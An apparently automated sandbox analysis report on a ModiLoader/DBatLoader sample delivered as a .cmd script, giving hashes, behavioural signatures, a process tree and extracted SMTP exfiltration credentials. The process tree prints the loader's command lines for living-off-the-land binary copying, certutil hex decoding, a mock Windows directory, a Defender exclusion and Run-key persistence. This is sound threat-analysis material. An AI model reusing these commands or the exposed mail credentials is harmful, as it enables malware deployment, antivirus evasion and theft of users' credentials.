Analysis
- max time kernel: 141s
- max time network: 127s
- platform: windows10-2004_x64
- resource: win10v2004-20240611-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240611-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 21-06-2024 02:00
Static task: static1
Behavioral task: behavioral1
- Sample: lNV-9088759885958.cmd
- Resource: win7-20240508-en
Behavioral task: behavioral2
- Sample: lNV-9088759885958.cmd
- Resource: win10v2004-20240611-en
General
- Target: lNV-9088759885958.cmd
- Size: 4.1MB
- MD5: 75a6cb4a92d02ef6c1bf0e5088190cb9
- SHA1: e99ebb72703971edc6e73f50b03b833fbbe0dde7
- SHA256: 5c65588d938a6d29b783795576286474107a7989112326cccbecdbdc433f41f3
- SHA512: 298ec5450835768029318bfb045de38b501eeb41c74e98d4c569da38ca2768fe026b9febc968508857fc9bfcdd3ac6cb4d8c640cdc2631d989e865bc4a2b2af2
- SSDEEP: 49152:50zbEfxlWCpt6Tz5d1ej30RxqEc0Z6oJYLmNfLIewZTJN6666Iuq66fKID6+6I6h:r
Malware Config
Extracted
- Protocol: smtp
- Host: mail.suryaberkatindonesia.com
- Port: 587
- Username: [email protected]
- Password: suryaber123
Signatures
- ModiLoader, DBatLoader
  ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
- ModiLoader Second Stage (2 IoCs)
  Processes (resource, yara rule):
  - behavioral2/memory/3680-56-0x0000000000400000-0x0000000001400000-memory.dmp: modiloader_stage2
  - behavioral2/memory/3680-59-0x0000000000400000-0x0000000001400000-memory.dmp: modiloader_stage2
- Command and Scripting Interpreter: PowerShell (1 TTPs, 1 IoCs)
  Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
- Executes dropped EXE (10 IoCs)
  Processes (pid, process):
  - 2696 alpha.exe
  - 2412 alpha.exe
  - 1668 kn.exe
  - 4708 alpha.exe
  - 1992 kn.exe
  - 1916 Audio.pif
  - 2220 alpha.exe
  - 4896 alpha.exe
  - 332 cmd.pif
  - 3680 uiuyfdvN.pif
- Loads dropped DLL (1 IoCs)
  Processes (pid, process):
  - 332 cmd.pif
- Reads user/profile data of local email clients (2 TTPs)
  Email clients store some user data on disk where infostealers will often target it.
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Adds Run key to start application (2 TTPs, 2 IoCs)
  Processes (description, ioc, process):
  - Set value (str): \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nvdfyuiu = "C:\\Users\\Public\\Nvdfyuiu.url" (Audio.pif)
  - Set value (str): \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\windows = "C:\\Users\\Admin\\AppData\\Roaming\\windows\\windows.exe" (uiuyfdvN.pif)
- Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 2 IoCs)
- Looks up external IP address via web service (1 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Processes (flow, ioc):
  - flow 36: ip-api.com
- Suspicious use of SetThreadContext (1 IoCs)
  Processes (description, pid, process, target process):
  - PID 1916 set thread context of 3680: Audio.pif -> uiuyfdvN.pif
- Script User-Agent (2 IoCs)
  Uses user-agent string associated with script host/environment.
  Processes (description, flow, ioc):
  - HTTP User-Agent header, flow 26: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  - HTTP User-Agent header, flow 28: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- Suspicious behavior: EnumeratesProcesses (6 IoCs)
  Processes (pid, process; repeated entries collapsed with a count):
  - 4628 powershell.exe (x3)
  - 3680 uiuyfdvN.pif (x3)
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Processes (description, pid, process):
  - Token: SeDebugPrivilege, 4628 powershell.exe
  - Token: SeDebugPrivilege, 3680 uiuyfdvN.pif
- Suspicious use of WriteProcessMemory (42 IoCs)
  Processes (description, pid, process, target process; repeated entries collapsed with a count):
  - PID 2516 wrote to memory of 3408: cmd.exe -> extrac32.exe (x2)
  - PID 2516 wrote to memory of 2696: cmd.exe -> alpha.exe (x2)
  - PID 2696 wrote to memory of 1516: alpha.exe -> extrac32.exe (x2)
  - PID 2516 wrote to memory of 2412: cmd.exe -> alpha.exe (x2)
  - PID 2412 wrote to memory of 1668: alpha.exe -> kn.exe (x2)
  - PID 2516 wrote to memory of 4708: cmd.exe -> alpha.exe (x2)
  - PID 4708 wrote to memory of 1992: alpha.exe -> kn.exe (x2)
  - PID 2516 wrote to memory of 1916: cmd.exe -> Audio.pif (x3)
  - PID 2516 wrote to memory of 2220: cmd.exe -> alpha.exe (x2)
  - PID 2516 wrote to memory of 4896: cmd.exe -> alpha.exe (x2)
  - PID 1916 wrote to memory of 2872: Audio.pif -> cmd.exe (x3)
  - PID 1916 wrote to memory of 1952: Audio.pif -> cmd.exe (x3)
  - PID 1916 wrote to memory of 2488: Audio.pif -> cmd.exe (x3)
  - PID 2488 wrote to memory of 332: cmd.exe -> cmd.pif (x2)
  - PID 332 wrote to memory of 4628: cmd.pif -> powershell.exe (x2)
  - PID 1916 wrote to memory of 4164: Audio.pif -> extrac32.exe (x3)
  - PID 1916 wrote to memory of 3680: Audio.pif -> uiuyfdvN.pif (x5)
Processes (process tree; nesting shows parent/child)
- C:\Windows\system32\cmd.exe (PID 2516)
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\lNV-9088759885958.cmd"
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\System32\extrac32.exe (PID 3408)
    Command line: C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
  - C:\Users\Public\alpha.exe (PID 2696)
    Command line: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
    Signatures: Executes dropped EXE; Suspicious use of WriteProcessMemory
    - C:\Windows\system32\extrac32.exe (PID 1516)
      Command line: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
  - C:\Users\Public\alpha.exe (PID 2412)
    Command line: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\lNV-9088759885958.cmd" "C:\\Users\\Public\\Audio.mp4" 9
    Signatures: Executes dropped EXE; Suspicious use of WriteProcessMemory
    - C:\Users\Public\kn.exe (PID 1668)
      Command line: C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\lNV-9088759885958.cmd" "C:\\Users\\Public\\Audio.mp4" 9
      Signatures: Executes dropped EXE
  - C:\Users\Public\alpha.exe (PID 4708)
    Command line: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Audio.mp4" "C:\\Users\\Public\\Libraries\\Audio.pif" 12
    Signatures: Executes dropped EXE; Suspicious use of WriteProcessMemory
    - C:\Users\Public\kn.exe (PID 1992)
      Command line: C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Audio.mp4" "C:\\Users\\Public\\Libraries\\Audio.pif" 12
      Signatures: Executes dropped EXE
  - C:\Users\Public\Libraries\Audio.pif (PID 1916)
    Command line: C:\Users\Public\Libraries\Audio.pif
    Signatures: Executes dropped EXE; Adds Run key to start application; Suspicious use of SetThreadContext; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\cmd.exe (PID 2872)
      Command line: cmd /c mkdir "\\?\C:\Windows "
    - C:\Windows\SysWOW64\cmd.exe (PID 1952)
      Command line: cmd /c mkdir "\\?\C:\Windows \System32"
    - C:\Windows\SysWOW64\cmd.exe (PID 2488)
      Command line: cmd /c "C:\\Windows \\System32\\cmd.pif"
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows \System32\cmd.pif (PID 332)
        Command line: "C:\\Windows \\System32\\cmd.pif"
        Signatures: Executes dropped EXE; Loads dropped DLL; Suspicious use of WriteProcessMemory
        - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4628)
          Command line: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:'
          Signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\extrac32.exe (PID 4164)
      Command line: C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\Audio.pif C:\\Users\\Public\\Libraries\\Nvdfyuiu.PIF
    - C:\Users\Public\Libraries\uiuyfdvN.pif (PID 3680)
      Command line: C:\Users\Public\Libraries\uiuyfdvN.pif
      Signatures: Executes dropped EXE; Adds Run key to start application; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - C:\Users\Public\alpha.exe (PID 2220)
    Command line: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
    Signatures: Executes dropped EXE
  - C:\Users\Public\alpha.exe (PID 4896)
    Command line: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Audio.mp4" / A / F / Q / S
    Signatures: Executes dropped EXE
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 408)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4296,i,3595107284059830391,18018199024659337217,262144 --variations-seed-version --mojo-platform-channel-handle=4112 /prefetch:8
Network
MITRE ATT&CK Enterprise v15
Downloads